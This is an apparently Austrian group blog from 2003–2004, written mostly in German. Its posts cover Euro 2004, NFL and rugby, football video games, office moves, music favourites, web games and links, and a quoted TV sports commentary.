+ Die Tschechen-Fans singen hämisch: „Auf Wiedersehen.“ Nein! Diese Truppe will niemand wiedersehen...

UPDATE (JUNE 28th):

die semifinali:



einer hervorragenden gruppenphase bei der euro 04 folgten nun leider leicht ernüchternde viertelfinal-spiele. ok, portugal - england war noch ganz gut, aber bis auf gute 20 minuten der tschechen war sonst nicht mehr viel zu sehen. wir können nur hoffen, dass sich das bei den halbfinali wieder ändert.

mein traum-finale holland - tschechien ist immernoch möglich. am mittwoch erwartet uns sicher ein spannendes match (dass es hochklassig wird, können wir nur hoffen). die tschechen werden die griechen heimschicken, da mach ich mir wirklich überhaupt keine sorgen, und danach auch das finale gewinnen!!!

nurnoch 3 spiele :-(((((

aber da kommt schon noch was auf uns zu!!!!
time out  sTe  05.06.2004 03:30:57

das wetter hier haelt ja keine sau aus...;
brav bleiben...und aufwiederschaun...
i so say thank you...  sTe  02.06.2004 22:25:54
video gibts von der webcam, pics folgen nach urlaub...


vielen dank an alle, langsam check ichs :) !!!
euro gambling  sTe  26.05.2004 12:46:15
die euro 2004 steht (hoffentlich) bekannterweise vor der tuer -
aus diesem anlass hab ich die derzeitigen state-of-the-art
pc-games zum thema soccer getestet:

vorweg die testkandidaten:
Pro Evolution Soccer und Winning Eleven (beide sind fast identisch und unterscheiden sich nur minimal) von Konami;
Euro2004 von EA Sports.

PES 3 und Winning Eleven sind nicht nur die besten sondern auch realistischten fussballgames die je erschienen sind.
jedes tor anders und man erlebt immer noch neues, waehrend man bei Euro2004 schon nach wenigen tagen alles gesehen hat.
vor allem die ballphysik ist einfach ein traum, fast lebensecht.
auch in Sachen taktik (freies positionieren der Spieler, für jeden Spieler eigene taktikeinstellung moeglich etc.)
ist PES 3 meilenweit voraus!
Die fehlenden rechte and offiziellen spielern werden durch die immer groeßer werdende PES community
locker wettgemacht, und es erscheinen immer neue kits und patches.
leider hat EA in den letzten jahren bei der serie extrem nachgelassen!



riegersburg 2004  sTe  24.05.2004 23:35:54
das zweite mal in riegersburg; grillerei und festplatte, hee oder wos, die einzigen 2 wettermaessig anstaendigen tage im mai bisher, we liked it...
ps: best photo goes to hons
17.05.2004 in eigener sache  sTe  17.05.2004 21:35:22
wie die treuen visitors bemerkt haben, ist feelosophee in letzer zeit etwas vernachlaessigt upgedated worden;
gruende dafuer sind einerseits meine berufliche veraenderung und die damit verbundene fehlende zeit durch neuorientierung, aber auch der fehlende input der anderen redakteure (except bully)

daher erfolgt ein umdenken: feelosophee kehrt in den naechsten wochen nach hause. sprich wird in AUT gehostet; ein neues konzept wird in absprache aller interessierten erstellt; neue publishing moeglichkeiten eingefuehrt;

vorschlaege und anregungen sind von allen seiten mehr als erwuenscht!
:: BLATTER AGAINST THE LIONS  bully  13.05.2004 20:58:44
also, dieser 6 punkte abzug (wm-quali) für die einteiler kameruns beim afrika-cup halt ich für eine volle frechheit!!! nur weil der blatter glaubt da irgendeine privat-fehde austragen zu müssen, lächerlich!!!

allen fussballfreunden, die die unzähmbaren löwen auch gern in deutschland bei der wm sehen würden ist dieser LINK zu empfehlen!!!
Blickpunkt FCB  sTe  11.05.2004 10:50:39
Kommentar von Moderator Waldemar Hartmann in Blickpunkt Sport vom 10. Mai

Liebe Zuschauer,
nach 20 Jahren und weit mehr als 200 moderierten Sendungen „Blickpunkt Sport“ wende ich mich erstmals mit einem persönlichen Kommentar an Sie.
Sie hier im Studio und Sie zuhause haben natürlich gerade heute einen Gast vom FC Bayern München erwartet.
Doch nach zahllosen Telefonaten und persönlichen Gesprächen im Laufe der vergangenen Woche hat sich bis heute niemand vom FC Bayern finden lassen, der in diesem Studio Rede und Antwort steht.
In einer Disziplin Reden also, die seit Wochen zu den bevorzugten und besonders ausgeprägten Fähigkeiten beim deutschen Rekordmeister zählt. Schon vor der Begegnung in Köln hatte ich dem Pressedirektor Markus Hörwick und Manager Uli Hoeneß die besondere Bedeutung dieser Sendung nach dem Gipfeltreffen mit Werder Bremen eindringlich nahegebracht.
Beide nahmen das zur Kenntnis. Hoeneß sagte aber gleich, heute abend zu einer privaten Geburtstagsfeier eingeladen zu sein. In weiteren Telefonaten noch vor dem Debakel gegen Bremen zeigten sich Hörwick und Hoeneß problembewußt und signalisierten Unterstützung. Ottmar Hitzfeld, Oliver Kahn oder Karl-Heinz Rummenigge - nicht alle drei! - nur einer davon - sollte heute hier sitzen. Alle ließen heute nachmittag absagen. Unsere Wünsche - weggefegt!
Sie müssen nicht mir einen Gefallen tun, ich mache diese Sendung nicht für mein Poesiealbum. Meine hartnäckig vorgetragenen Bitten begründen sich durch journalistische Sorgfaltspflicht und vor allem - hören Sie gut zu - durch das Recht der Fans des FC Bayern, von ihnen über Geschehenes aufgeklärt und über Zukünftiges informiert zu werden. In Hochglanzbroschüren verkünden sie stolz, daß der FC Bayern alleine in Deutschland rund zehn Millionen Menschen zu seinen Sympathisanten zähle. Die sehen sich alle nicht erst seit Samstag der Häme von mindestens genau so viel extrem anders Denkenden ausgesetzt. Ihre Fans suchen und warten auf Antworten. Ich kann die nicht liefern. Das ist ihre Aufgabe. Das gehört zu ihrem Geschäft. Wie die Mannschaft haben sie eine große Chance verpasst, den FC Bayern würdig zu vertreten.
chill & burn   sTe  05.01.2004 21:48:18

1st of may on the countryside (Teesdorf);
zuerst beruflich bei den astra-driving-days vergleichsfahrten am öamtc gelaende; dann chill out und slight sunburn am baggersee; we liked it as much as the dog...
mcGurk  sTe  26.04.2004 17:35:38
Play the McGurk-effect video, first with your eyes open and then with your eyes closed. You’ll see how your eye can trick your ear.
butter  sTe  23.04.2004 13:01:32
das wars jetzt mit der unschuld im kuehlregal. ich werde nie wieder im supermarkt, ohne dass es mir ein schauer über den ruecken jagen wird, bei den kuehlprodukten vorbeigehen können. nie mehr ein butterbrot essen ohne mich aengstlich umzusehen, ob vielleicht Udo Jürgens ploetzlich bei mir in der kueche steht und auf einmal "Aber bitte mit ..." vom besten gibt. werbespot hier
office view  sTe  22.04.2004 16:22:14
.kkrieger   sTe  16.04.2004 12:03:35
beeindruckende 96k klein! (thx to darkseid)
vive o 2004  sTe  12.04.2004 13:17:15
see the passion concept and get the desktop predition chart ;
:: entertaining  bully  09.04.2004 21:31:17
Catapult Game, auch ganz nett, wie ich finde...
1st try: 7305 P.

und DAS hat ma gaaaaanz früher in den spielhöllen volle getaugt!!!
easter  sTe  09.04.2004 10:01:32
feelosophee wuenscht allen FROHE OSTERN!
Newsmap  sTe  07.04.2004 09:29:21
google news in flash. terrific work !!!

the adventures of Seinfeld and Superman.

a web server inside a frog.
evil part 2  sTe  04.03.2004 18:50:23
ford ka commercial part 2 updated link !!!
up and running  sTe  04.01.2004 19:06:38
es ist vollbracht: indeed! ist uebersiedelt; nach einem monat renovieren, schleppen, frieren, sitzen wir bei wohligen 20 grad im neuen office; ein dank an alle helfenden haende! photos hier...
respect UR  sTe  17.03.2004 22:02:44
eigentlich unglaublich, dass von diesem haufen (Ultras Rapid) einmal eine doch sehr amuesante aktion ausgeht; trotzdem respect! und der staatsfunk faellt drauf rein, bring keine einzige einstellung davon, verzichtet sogar im LIVE spiel auf eine wichtige perspektive und Hansi Huber spricht von einem transparent welches die kamera verdecke bzw einem regelwidrigen ebensolchen,... LOL!!!
spitzfindige personen wuerden anmerken, eine kamera sei ein objektiv und kein subjetiv - aber bei uns wird mit kritik anders umgegangen, vielen dank herr regisseur fuer diese peinliche performance!
first office impressions  sTe  12.03.2004 23:37:25
whats going on...moeglichst authentisch dokumentiert
:: OHNE WORTE  bully  11.03.2004 12:34:59
Schiiifoan!!! / Be aware you Pärsons, Götschls and Montillets  romario11  06.03.2004 21:33:06
Just returned from an amazing week of skiing in the Carinthian mountains. Perfect weather, perfect snow and very nice people, including Sals ski-instructor Alfred. He managed to train my sweetheart so well that she completed the Schischul-classes yesterday racing a Giant Slalom on the dangerously steep Sonnleitn Lift in less than two mins (see pic.). Congratulations my love for that amazing effort! Be aware you Pärsons, Götschls and Montillets - here comes Sals, cool runnings from D.R.!
weekend gaming  sTe  03.05.2004 23:17:13
old school Helicopter Game - very addicting...(1km als erste herausforderung)
Bloody Pingu Throw - 902,9 1030,6 m als pers hoechstweite; (thx to darkseid)
Grow - pretty weird game, but fun at least for me, just guess the rigtht order and enjoy
final office   sTe  03.01.2004 16:33:32
its fixed, its ours, its beautiful...
address: schulgasse / 1180 wien;
124 sqm incl serverkeller


office  sTe  26.02.2004 20:51:55
this one is in all probability our new office;
garden inclusive - just imagine its summer...and green

:: WAHLKABINE.AT  bully  23.02.2004 19:46:02
wie auch schon vor der letzten nationalratswahl gibts für unentschlossene kärntner und salzburger jetzt wieder die gelegenheit sich online weiterhelfen zu lassen.
wahlkabine.at zeigt, welchen parteien man näher steht und welchen nicht...

ps: den pinguin gibts auch fürs handy (hab ihn!). zB unter sms.at oder one.at
leap year  sTe  23.02.2004 11:46:07
Ein Jahr dauert etwa 365,25 Tage, so dass keine einfache Zuordnung, die jedem Jahr die gleiche Anzahl Tage gibt, möglich ist, ohne dass sich gleichzeitig der Beginn der Jahreszeiten verschiebt. Wenn allerdings in geeigneten Abständen ein Schaltjahr, ein Jahr mit einem zusätzlichen Tag, eingefügt wird, kann der Beginn der Jahreszeiten auf dem gleichen Datum festgehalten werden.
Eine einfache Methode ist, jedes Jahr mit einer glatt (ohne Rest) durch 4 teilbaren Jahreszahl zum Schaltjahr zu erheben, in dem der Februar 29 statt 28 Tage hat (Julianischer Kalender).

Da das Jahr aber in Wirklichkeit nur 365,2421896698 Tage dauert, wurde von Papst Gregor XIII. ab dem 15. Oktober 1582 folgende Regelung eingeführt (Gregorianischer Kalender):

-Glatt durch 4 teilbare Jahre sind Schaltjahre.
-Glatt durch 100 teilbare Jahre sind jedoch keine Schaltjahre.
-Glatt durch 400 teilbare Jahre sind aber wieder Schaltjahre.
So sind z.B. die Jahre 1800, 1900 und 2100 keine Schaltjahre. Die Jahre 2000, 2400 sind jedoch Schaltjahre. Damit dauert das Gregorianische Jahr 365,2425 Tage, und ist genauer als das Julianische Jahr.

Jedoch ist das gregorianische Jahr rund 27 Sekunden zu lang. Als Ergebnis hinkt der gregorianische Kalender nach 4000 Jahren um einen halben Tag hinterher. Deshalb schlug die griechisch-orthodoxe Kirche eine etwas kompliziertere Schaltregel vor: Abweichend vom gregorianischen Kalender sind die Jahrhunderte nur dann Schaltjahr, wenn sie durch 9 geteilt den Rest 2 oder 6 ergeben. Damit wäre das Jahr 2800 kein Schaltjahr, sondern erst das Jahr 2900. Die Abweichung zum Sonnenjahr beträgt beim orthodoxen Kirchenkalender nur noch knapp 3 Sekunden.

nona montag...  sTe  23.02.2004 09:58:08
...gibts was schoeneres als bei sauwetter in aller frueh auf einen bueromakler zu warten, der dann doch nicht kommt ...
irrational  sTe  19.02.2004 21:39:27
some math: what irrational number are you?
i am root2

zur auffrischung: Irrationale Zahlen :)
oarg was man so alles verdraengt mit der zeit...
via uti
:: RIP, Elefantino!!!  bully  15.02.2004 15:46:22

Gestern Abend verstarb Marco Pantani, il pirata...

Die Umstände sind rätselhaft...

feelo recherchiert schockiert...

RIPOSA IN PACE, ELEFANTINO!!!


FOCUS spricht von Selbstmord.
Die Gazzetta spekuliert weniger...
... wartet auf die morgige Autopsie.
Laut Presse.com keine Gewaltanwendung...
Sport1 vermutet ebenfalls Selbstmord.
delicious  sTe  10.02.2004 09:55:32
endlich gibts mal was positives aus unserer finanzwirtschaft zu berichten: geschäftsessen werden steuerlich wieder voll absetzbar; hilft mir zwar kaum beim gedanken an die 2jaehrige steuernachzahlung :(
aber vielleicht will ja wer einen chatroom um 40.000 € von mir programmiert haben, dann schaut die sache wieder besser aus..
the quick brown fox...  ste  09.02.2004 11:15:03
vom phoenix zum firebird und nun zum firefox metamorphed; version 0.8 des exzellenten browser ist ab sofort verfuegbar;
mehr als brauchbar sind auch diese developer extensions;
i like it!
sax  sTe  08.02.2004 20:27:59
my first commercial music-related project is online: Gerald Preinfalk it took me 6 years to get a customer of this branch; its not rock, its jazz, more precisely ist sax; anyway, it was a pleasure...
:: 2003 - The Year in Pictures  bully  02.05.2004 19:30:29


Die Bilder des Jahres 2003 von NBC

(ca. 10 min. Zeit nehmen!!!)

:: AKTUALISIERUNG - AERODROME 04:  bully  02.04.2004 18:37:55

Hier die aktuelle Aerodrome-Bandlist:

06-10:
Main Stage:
RED HOT CHILI PEPPERS
PIXIES
DIE TOTEN HOSEN
JANES ADDICTION

2nd Stage:
SLAYER
ILL NINO
HATEBREED
PUNGENT STENCH


06-11:
Main Stage:
METALLICA
KORN
SLIPKNOT
2nd Stage:
MIA

sounds promising, ha? ;-)))
Die Entfernung zwischen den 2 Bühnen beträgt übrigens ca. 400 Meter...
official announcement  sTe  02.03.2004 14:47:40

Happy retirement, Dave!  romario11  30.01.2004 23:46:01
Today the inventor of Ctrl-Alt-Delete retired from his job at IBM in order to concentrate on his private life and his being a professor at the University of North Carolina. David says about his most significant piece of work, which he had done in five minutes: "I may have invented it, but Microsoft made it popular." Way to go Dave, way to go.
30-day McDonald´s diet  sTe  30.01.2004 20:50:43
the mission: to eat three meals a day for 30 days at McDonald´s and document the impact on health;

feelo schmeckts trotzdem...
:: dear catastrophee waitress  sTe  29.01.2004 19:45:47
seit montag gibts keinen gscheiten kaffee mehr da die machine streikt;
als ersatz reicht der gute alte instant hoechstens in punkto koffein; geschmacklich grenzts fast an ein verbrechen; und die reperatur dauert mind. 2 wochen; womit haben wir das verdient :(


:: congratz!!!  bully  29.01.2004 12:14:30
hiermit gratulier ich feelosophee.com gaaaanz herzlich zum überschreiten der 100.000-hits - marke!!!!

GOOOOOOOOD JOOOOOOOOOB!!!!!!!!!!!!!!!!
:: training  sTe  27.01.2004 14:15:54
"morgen kommt da Bill Gates nach Wien und zeigt am Schüssel wies PowerPoint funktioniert..."
rist
passend dazu diese geistreiche veranstaltung der open-sourceler...
goooool  sTe  24.01.2004 13:49:58
die besten Tore aus 3 Jahrzehnten stehen zur wahl,...sind schon ein paar leckerbissen dabei...
f(ee)glet  sTe  20.01.2004 15:02:35
                                               
/) /) /)
// _ _ // ___ _ ___ __ (/ _ _
/(_ _(/__(/_(/_ (_) /_)_(_) /_)_/ )__(/__(/_
/) .-/
(/ (_/




done with figlet
do sitzt a  babsi  19.01.2004 22:06:06
pinguin...oder fliegt er doch ?!?
als vorgabe legen wir 316 meter vor!

UPDATE!!! offenbar handelt es sich hierbei um ein echtes österreichisches produkt der firma Edelweiss Medienwerkst.at ;
momentan wird das spiel schon, so wie hier auf feelo, auf versch. servern angeboten teilweise auch aufgebohrt und gemodded...
:: malita  sTe  14.01.2004 15:25:27


via babble
:: NFL - PLAYOFFS 2004  bully  13.01.2004 12:40:49
Wegen aktuen Zeitmangels wird heuer auf feelo die Playoff-Phase der NFL leider viel zu stiefmütterlich behandelt.
Wir befinden uns schon in der Endphase und die letzten 4 Teams trennt nur noch ein Sieg vom Einzug in die Superbowl XXXVIII am 1. Februar in Houston, Texas.

Am Sonntag finden die Championship-Games statt. In der AFC treffen zunächst um 21.00 Uhr die New England Patriots zu Hause auf die Indianapolis Colts. Direkt im Anschluss (0.45 Uhr) sind in der NFC die Carolina Panthers bei den Philadelphia Eagles zu Gast. Spannende und mitreissende Partien sind garantiert!!!

Mein Tipp für die Superbowl: Sieg der Eagles über die Patriots
brick by brikett  sTe  12.01.2004 11:14:59
erste website seit meinem einstieg bei indeed! ist online: http://www.kohlenhandel.at



:: feelofont  sTe  06.01.2004 19:49:54
Fontifier “turns a scanned sample of your handwriting into a computer font that you can use in your word processor or graphics program, just like regular fonts such as Helvetica.”

etwas herumspielen und es kommt echt ein annehmbares ergebnis raus - nice...
:: top 15 of 2003  sTe  02.02.2004 00:36:16
Yes, same procedure as every year:
ein subjektiver rueckblick auf das vergangene musikalische jahr:
hier sind die 15 feelofavs:

White Stripes - 7 Nation Army
Jet - Are You Gonna Be My Girl
Johnny Cash - The Man Comes Around
Black Rebel Motorcycle Club - Stop
Grandaddy - El Caminos In The West
Jayhawks - All The Right Reasons
Red Hot Chili Peppers - Fortune Faded
Strokes - 12:51
Placebo - Special Needs
Muse - Falling Away with You
Dandy Warhols - You Were The Last High
Korn - Right Now
Belle & Sebastian - Step Into My Office, Baby
Ataris - The Boys Of Summer
Coral - Pass It On
:: HAPPY NEW YEAR TO ALL OF YOU !!!  bully  30.12.2003 13:08:21

Der Wahnsinn hatte sich entschlossen, seine Freunde zum Kaffee einzuladen. Alle Gäste gingen hin und nach dem Dessert schlug der Wahnsinn vor: "Lasst uns verstecken spielen!"

"Verstecken? Was ist das?" fragte die Neugier. "Verstecken ist ein Spiel. Ich zähle bis hundert und ihr versteckt euch. Wenn ich dann fertig gezählt habe, muss ich euch suchen und der erste, den ich finde, ist als nächstes mit Zählen dran."

Alle akzeptierten, außer der Furcht und der Faulheit.

"1, 2, 3,..." - fing der Wahnsinn zu zählen an. Die Eile versteckte sich als erste - irgendwo, irgendwie. Die Schüchternheit, schüchtern wie üblich, versteckte sich in einer Baumkrone. Die Freude rannte durch den Garten. Die Traurigkeit fing zu weinen an, da sie keinen richtigen Platz zum Verstecken fand. Der Neid ging mit dem Triumph und versteckte sich ganz nahe bei ihm hinter einem Felsen. Der Wahnsinn zählte immer weiter, während seine Freunde sich versteckten. Die Verzweiflung war verzweifelt als sie feststellte, dass der Wahnsinn schon bei 99 angekommen war.

"HUNDERT!" schrie der Wahnsinn. "Ich fange jetzt an zu suchen..."
Die erste, die gefunden wurde war die Neugier, denn sie konnte es sich nicht verkneifen, aus ihrem Versteck zu kommen um zu sehen, wer als erstes geschnappt würde. Als sich der Wahnsinn etwas umsah, entdeckte er den Zweifel auf einer Mauer - der wusste nicht, ob es besser sei, sich davor oder dahinter zu verstecken. So ging es dann weiter: Er entdeckte die Freude, die Traurigkeit, die Schüchternheit... Als sie wieder beisammen waren, fragte die Neugier: "Wo ist denn die Liebe?"

Niemand hatte sie gesehen. Der Wahnsinn fing an, sie zu suchen. Er suchte in den Bergen, Flüssen und unter den Felsen - ohne Erfolg. Er sah einen Rosenbusch und ging mit Hilfe eines Holzstöckchens zwischen den Zweigen auf die Suche - da hörte er plötzlich einen Schrei.

Es war die Liebe. Sie schrie, weil ein Dorn ihr Auge verletzt hatte. Der Wahnsinn wusste nicht was er tun sollte. Er bat um Verzeihung, flehte um Vergebung und versprach der Liebe, für immer ihre Sehkraft zu werden. Die Liebe akzeptierte die Entschuldigungen.

Deshalb ist heute die Liebe blind und wird ständig vom Wahnsinn begleitet...
somewhere, something went terribly wrong  sTe  18.12.2003 22:02:29
star  sTe  16.12.2003 16:00:49
Tell the Birthday Stars computer when you were born, and it will look for a star that is your age in light years away from Earth. this means that the light we’re seeing from that star today actually left the star around when you were born, and has taken your entire life to reach Earth.
ambience & centerfold  sTe  14.12.2003 19:02:05
if you spent dozens of hours your life in the arcades like I did in the eighties, you know that a great part of the experience was the atmosphere and especially the sounds. Andy Hofle has created two hour-long tracks recreating that particular ambience. Absolutely fantastic!

putting all the playboy centerfolds as layers into one single image, gives some interesting effects i would say

blackout  sTe  12.06.2003 21:03:23
Power cut? No big deal, use the phone line instead.
interessant vor allem nach der letzten studie der tu-wien, wo unsere hauptversorgungstrecken mehr als ueberbelastet sind...
save that screen  sTe  12.04.2003 22:57:11
Purrint is a handy little Windows tool (85k) for enhancing your PrintScreen button (located right beside of the F12 key).
so macht screenshoten spass!!!
live @ slane  sTe  12.02.2003 23:48:48
weil gerade so viel von konzerten gesprochen wird, und weil bald weihnachten ist, und fuer alle die, die noch wunschlos sind, hier eine empfehlung erster guete: RHCP@SLANE;
unglaubliches ambiente, phantastische stimmung;
this one kicks u2´s ass out of ireland (hard to say, but so true)
John ´fuckin´ Frusciante in bestform !!!
feelos no1 dvdeee of 200three!
:: AUFWÄRTSTREND  bully  12.01.2003 12:54:36
Nur damit das hier durch die nicht mehr ernstzunehmende Partie in Parma nicht untergeht; der Aufwärtstrend ist da !!!

Die letzten 4 Bundesligaspiele:
5-0 gegen Sturm
0-0 beim FAK
4-0 gegen Mattersburg
3-0 in Kärnten

Gemma Burschen, ein Sieg noch gegen den FAK und dann gehts (leider) eh in die Winterpause...

Irgendwie erinnert mich diese Saison schon seeehr stark an die vergangene; hoffentlich gehts im Frühjahr auch so weiter!!!

:: AERODROME im Juni 2004  bully  12.01.2003 17:10:41

Nach wochenlangen vertraulichen Verhandlungen ist es nun offiziell:

Im Juni 2004 wird die in CIVITAS NOVA umbenannte Region um das Wr. Neustädter Flugfeld und das dort ansässige Kulturhaus „Arena Nova“ erstmals Schauplatz eines musikalischen Groß-Events noch nie da gewesenen Ausmaßes werden:

Unter dem Festival-Titel AERODROME wird der Veranstalter in Kooperation mit der „Stadt Wr. Neustadt“ und einer Reihe namhafter Sponsoren rechtzeitig zum EU-Erweiterungsjahr 2004, „nicht mehr und nicht weniger“, als eines der „größten Musik-Festivals Europas (!) etablieren“, das „den Vergleich mit alteingesessenen Festivals wie Roskilde (Dk), Sziget (Hu), Rock Am Ring (D), Rock Im Park (D), keinesfalls scheuen muss“.

AERODROME widmet sich zwei großen Bereichen der Musik: „Rock/ Metal & Alternative/Pop“. Neben den bereits bestätigten Auftritten von RED HOT CHILI PEPPERS (10.06.) und METALLICA (11.06.), als Headliner jeweils einer der beiden Spieltage, versammelt AERODROME 23 weitere namhafte Bands und Artists. Jeden Monat - beginnend mit 15.12.2003 - werden die neusten Verpflichtungen bekannt gegeben.

INFOS / TICKETS

Bezüglich der EURO 2004 kommt es zu KEINER Terminkollision.
Das Eröffnungsspiel Portugal gegen Griechenland findet am Tag darauf, am 12.6., statt.

Dieser Teil wird ständig aktualisiert.
Zugesagt bis jetzt haben:
+ RED HOT CHILI PEPPERS
+ DIE TOTEN HOSEN
+ METALLICA
+ KORN
+ SLIPKNOT
:: santa - na!  sTe  27.11.2003 16:12:01
dieses jahr hab ich der infiltration der adventzeit durch dicken weihnachts ami päderasten nur rechtsstehendes bild entgegenzusetzen...
als untertitel schlage ich vor: rip his head off!!!
(aufgenommen im 18.bezirk)


:: nomen est omen  sTe  26.11.2003 22:33:36
superb screensaver for workaholics...
columbo  sTe  20.11.2003 15:04:07
alle die sich ueber die strangen referrer der letzten tage gewundert haben: hier eine erklaerung: porn sites hiding behind blogs oder the porn industry is at it again
:: NFL – eine Zwischenbilanz  bully  18.11.2003 23:00:26

Nach absolvierten 10 von jeweils 16 Spielen pro Team wird es nun aber wirklich Zeit eine kleine Zwischenbilanz zu ziehen. Wer hat die besten Play-off-Chancen, wer wird wohl MVP, wer hat bis jetzt positiv und wer negativ überrascht...

Zuerst einmal die Play-off-Vorschau, hier ist es natürlich wieder von Nöten sich jeden Division einzeln anzuschaun; nur noch mal zur Erläuterung: Pro Conference kommen die vier Divisionssieger plus die zwei nächstbesten Teams (Wildcard) in die Play-offs und eruiren dann im KO-Modus die beiden Superbowl-Teilnehmer. Erwähnen werd ich hier nur die Teams, die noch realistische Playoff-Chancen haben.

AFC East:
1. New England Patriots 8 Siege – 2 Niederlagen
2. Miami Dolphins 6-4
3. Buffalo Bills 4-6

Die Patriots marschieren durch, keine Frage; sechs Siege in den letzten sechs Spielen sprechen eine deutliche Sprache. Die Dolphins maximal noch mit Chancen auf eine Wildcard.

AFC North:
1. Baltimore Ravens 5-5
2. Cincinnati Bengals 5-5
3. Cleveland Browns 4-6
4. Pittsburgh Steelers 3-7

Eigentlich unglaublich, dass ein Team mit 3-7 noch realistische Play-off-Chancen hat, aber in der AFC North ist echt noch alles möglich; ich hoffe ja auf die Bengals, die letztes Jahr in 16 Spielen nur einen einzigen Sieg nach Hause fahren konnten, aber auch die Chancen der Steelers sind gar nicht soo gering. Alles ist möglich, mein Tipp: die Browns schaffens.

AFC South:
1. Indianapolis Colts 8-2
2. Tennessee Titans 8-2

Beide Teams sind schon mit eineinhalb Beinen in den Play-offs. Die Titans werden die Division gewinnen, die Colts schaffen souverän das Wildcard-Ticket.

AFC West:
1. Kansas City Chiefs 9-1
2. Denver Broncos 6-4

Nach 9 Siegen in Folge erlitten die Chiefs letzte Woche die erste Saisonniederlage. Die Dolphins von 1972 können also aufatmen; ihr Rekord als bis jetzt einziges Team eine ganze Saison lang ungeschlagen zu sein bleibt weiter bestehen. Trotzdem werden die Chiefs natürlich ihre Division gewinnen. Da wie vorhin erwähnt ein Wildcard-Ticket für die AFC South schon vergeben ist, wird sich Denver wohl mit den Dolphins und vielleicht auch noch einem Team aus der AFC North um das zweite duellieren; mein Tipp für das Wildcard-Team Nummer 2: Denver

NFC East:
1. Dallas Cowboys 7-3
2. Philadelphia Eagles 7-3

Die Cowboys schwächeln und die Eagles werden die East wohl noch relativ klar gewinnen.

NFC North:
1. Minnesota Vikings 6-4
2. Green Bay Packers 5-5

Nach einem 6-0-Start kassierten die Wikinger zuletzt vier Niederlagen in Folge, die Packers konnten am Wochenende hingegen sogar bei den Buccs gewinnen. So leids mir tut, aber Green Bay gewinnt die NFC North.

NFC South:
1. Carolina Panthers 8-2
2. New Orleans Saints 5-5
3. Tampa Bay Buccaneers 4-6

Die Panthers werden die South gewinnen, das steht für mich fest. Falls die Saints oder die Buccs wirklich noch die Chance auf ein Wildcard-Ticket haben wollen, müssen sie schon eine ordentliche Serie starten (den Buccs trau ich das vielleicht sogar zu, den Saints sicher nicht).

NFC West:
1. Seattle Seahawks 7-3
2. St. Louis Rams 7-3
3. San Francisco 49ers 5-5

Puuh, schwer zu sagen, wer sich hier durchsetzt, Bulger (Rams´ QB) wird immer solider, aber auch die Hawks scheinen schwer zu stoppen. Mein Tipp: Seahawks.
Wer holt sich nun die Wildcards in der NFC? Die Rams solltens schaffen, denk ich mal. Zur Zeit schauts noch gut aus für die Boys, aber ob sich Dallas da halten kann, wag ich mal zu bezweifeln... Wahrscheinlicher für mich die Vikings oder vielleicht ja doch noch die Buccs (glaub ich aber nicht).

Der MVP der Regular Season sollte wohl klar an Steve McNair gehen, wie er sein Team heuer trägt ist schon unglaublich.

Nun zu den Überraschungen, zuerst die positiven:
Nummer eins, ganz klar die Bengals, das Loser-Team der letzten Jahre steht heuer immerhin bei 5-5. Zweitens, die Chiefs, mit neun Siegen aus neun Spielen konnte wohl keiner rechnen, klarer Superbowl-Kandidat. Drittens, die Panthers, mit einem 8-2 nach 10 Spielen hab ich wirklich nicht gerechnet, eher schon mit 5-5, wenn überhaupt.
Jetzt die negativen:
Nummer eins, die Buccs, der Titelverteidiger konnte von den ersten 10 Spielen gerade mal vier gewinnen, wahrlich enttäuschend. Nummer zwei, die Jets, letztes Jahr noch in den Playoffs mit sehr starken Leistungen halten die grünen New Yorker heuer erst bei mickrigen 3 Siegen und belegen klar Rang 4 in der AFC East. Nummer drei, die Raiders, 3 Siege und erbärmliche Leistungen sind eines Superbowl-Teilnehmers wahrlich nicht würdig!!

Zwischenfazit:
Eine mitreissende Saison, sehr viel ist noch möglich, das Verletzungspech der Lions tut zwar weh, mehr als ein 7-9 wär aber auch mit allen Mann an Board heuer wohl nicht drin gewesen. Top-Superbowl-Contenders: Chiefs, Titans, Eagles und als Aussenseitertipp die Panthers.
pro evolution  sTe  18.11.2003 01:16:09
konami - einer der aeltesten digitalen spiele hersteller, bringt nun endlich die nonplusultra fussball simulation: pro evolution soccer 3 auch fuer pc heraus, und zwar uebermorgen;
ea sports kann sich in punkto fifa 2004 nun maechtig anschnallen, wenn nicht verabschieden....;
nahezu perfekte ballphysik, ein unglaublich gutes spielgefühl, diverse modi und unzählige einstellungs- und statistik-optionen.
ja, ich weiss, alle ps2 gamer hamms eh scho immer gsagt :)
:: RUGBY WORLD CUP 2003  bully  17.11.2003 00:24:48

Seit 10. Oktober findet in Australien die fünfte Rugby Weltmeisterschaft statt. Alle vier Jahre messen die 20 besten Teams der Weltrangliste ihre Kräfte; die bisherigen Titelträger kommen durch die Bank aus der südlichen Hemisphäre unseres Planeten. Erster Titelträger wurde Neuseeland, danach konnten noch Südafrika und zweimal Australien den Titel erringen.

Am Samstag setzten sich im ersten Halbfinale die Gastgeber etwas überraschend gegen die All Blacks aus Neuseeland mit 22-10 durch. Möglich wurde dieser Sieg erst durch einige haarsträubende Unkonzentriertheiten der Neuseeländer und durch eine sehr starke Defense-Leistung der Australier.

Im sonntäglichen zweiten Halbinale gewann England gegen Frankreich hochverdient mit 24-7. Alle englischen Punkte wurden vom Rugby-Superstar schlechthin, Jonny Wilkinson, erzielt.

Am Samstag, dem 22.11., kommt es nun also im Telstra Stadium von Sydney , dem Olympiastadion von 2000, zum grossen Finale:

Australien - England

Spielbeginn ist um 10.00 Uhr MEZ.
DSF überträgt live - don´t miss it!!!
thank god it´s friday...  sTe  14.11.2003 20:20:12
...ueber eine woche kein posting hat seltenheitswert, sorry!
es gab viel zu zu tun: die woche im zeitraffer: we war gezeichnet von den ungesunden nebenwirkungen des koartlaabends / montag: kunden mit viel kohle an land gezogen (leider nur im woertlichen sinne); dienstag: mini bekommen (zwar vorerst nur in 1:24 aber auch der macht ordentlich was her) und gansl im schilling (mehr als empfehlenswertes beisl) / mi/do/fr: kundenbetreuung, meetings, bug fixing,...
desweiteren ist feelosophee nun verbluetoothed;
und ein besuch bei metro um va die fluessigen needs von indeed (zz offline da provider spinnt) auf laengere zeit zu sichern;
UIII und verschlafen: feelo ist mittlerweile 3 jahre alt geworden...
:: schön war sie...  bully  11.09.2003 15:10:37



... die mondfinsternis!!!



:: Diese Seite...  bully  12.03.2003 00:56:17
... ist zwischen September und Dezember bzw. Jänner jede Woche einen Besuch wert:

www.buccaneers.com

Ich bin zwar überhaupt kein Buccs-Fan, aber die wöchentlichen Flash-Vorschauen auf die jeweils nächste Begegnung sind schon sehr zu empfehlen.
Alle bisherigen Intros dieser und der letzten Saison gibts hier:
2002 & 2003
